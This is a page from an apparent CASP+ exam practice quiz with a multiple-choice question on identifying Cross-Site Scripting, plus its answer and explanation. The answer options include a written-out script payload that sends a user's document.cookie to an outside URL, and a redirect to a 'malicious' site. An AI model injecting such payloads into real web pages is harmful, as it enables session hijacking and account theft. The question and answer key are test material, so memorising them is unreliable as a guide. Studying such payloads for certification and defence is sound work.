CompTIA CASP+ Practice Test

Disable ads (and more) with a membership for a one time $2.99 payment

Enhance your CompTIA CASP+ exam readiness with our comprehensive quizzes. Sharpen your skills with detailed flashcards and multiple choice questions, each with hints and in-depth explanations. Prepare effectively for this challenging exam!

Start Multiple Choice Practice Test
Start Flash Cards

Practice this question and more.

Which of the following code snippets is an example of a Cross-Site Scripting (XSS) attack?

  1. <SCRIPT>alert('XSS'); </SCRIPT>

  2. <SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie</SCRIPT>

  3. <SCRIPT>console.log('Testing'); </SCRIPT>

  4. <SCRIPT>window.location='http://malicious-site.com'</SCRIPT>

The correct answer is: <SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie</SCRIPT>

In scenarios involving Cross-Site Scripting (XSS) attacks, the primary goal is often to execute malicious scripts in the context of a user's session on a web application. The snippet that represents an XSS attack is the one that aims to capture a user's cookie and send it to a potentially malicious server. The correct choice demonstrates this by fetching the current document's cookies and appending them to a URL that points to a script on a different server. By executing this code, an attacker could exfiltrate session cookies from an unsuspecting user, potentially leading to session hijacking or unauthorized access to the user's account. Other options do not encapsulate this malicious intent effectively. For instance, one might seem benign, merely logging a message to the console, while another simply redirects the user to a webpage without stealing sensitive information. Thus, B is specifically targeted at compromising security by capturing cookies and redirecting them to an unauthorized location.

More Questions Like This